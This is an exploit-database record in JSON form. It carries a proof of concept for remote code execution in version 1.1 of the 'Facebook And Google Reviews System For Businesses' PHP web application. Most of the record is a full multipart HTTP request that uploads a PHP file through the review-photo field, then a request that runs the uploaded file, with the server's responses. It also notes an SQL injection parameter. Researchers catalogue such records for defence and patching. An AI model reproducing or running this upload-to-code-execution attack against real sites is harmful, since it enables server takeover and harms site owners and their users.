DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-31789", "type": "zdt", "bulletinFamily": "exploit", "title": "Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution", "description": "Exploit for php platform in category web applications", "published": "2018-12-15T00:00:00", "modified": "2018-12-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/31789", "reporter": "Ihsan Sencan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-12-18T06:37:35", "viewCount": 15, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "sourceHref": "https://0day.today/exploit/31789", "sourceData": "# Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559\r\n# Version: 1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n\r\n# POC: \r\n# 1) \r\n# http://localhost/[PATH]/reviews/campaign_add.php?id=[SQL]\r\n# \r\n\r\nPOST /[PATH]/reviews/action.php?action=custom_reviews HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/octet-stream\r\nContent-Length: 922\r\nReferer: http://localhost/[PATH]/reviews/custom_reviews_add.php\r\nCookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\n-----------------------------4704926813981: undefined\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"phpinfo.php\"\r\n<?php\r\nphpinfo();\r\n?>\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"hidden_photo\"\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"name\"\r\nEfe\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"rating\"\r\n4.5\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"review\"\r\nEfe\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"date\"\r\n12/14/2018\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"id\"\r\n-----------------------------4704926813981\r\nContent-Disposition: form-data; name=\"submit\"\r\nsubmit\r\n-----------------------------4704926813981--\r\nHTTP/1.1 302 Found\r\nDate: Fri, 14 Dec 2018 18:17:48 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/7.0.33\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nlocation: custom_reviews.php\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n\r\nGET /[PATH]/reviews/uploads/264082phpinfo.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: */*\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/[PATH]/reviews/custom_reviews.php\r\nCookie: PHPSESSID=t7hinqk30gq4ies69nno1lj2b0\r\nDNT: 1\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Fri, 14 Dec 2018 18:17:49 GMT\r\nServer: Apache\r\nX-Powered-By: PHP/7.0.33\r\nKeep-Alive: timeout=5, max=99\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-12-18] #", "_state": {"dependencies": 1645403945, "score": 1659805755}, "_internal": {"score_hash": "e8a779cd10c4d92d8d1f870715b589d1"}}

{}